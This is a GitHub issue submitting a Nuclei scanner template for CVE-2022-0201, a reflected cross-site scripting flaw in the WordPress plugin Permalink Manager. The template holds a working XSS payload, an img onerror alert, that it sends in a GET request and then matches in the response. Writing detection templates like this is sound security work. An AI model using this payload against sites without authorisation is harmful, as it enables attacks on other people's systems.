### ISSUE TITLE
CVE-2022-0201

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4286]
```yaml
id: CVE-2022-0201

info:
  name: Permalink Manager < 2.2.15 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugins do not sanitise and escape query parameters before outputting them back in the debug page, leading to a Reflected Cross-Site Scripting issue.
  reference:
    - https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4
  tags: xss,wp,wordpress,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src onerror=alert(/XSS/)>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
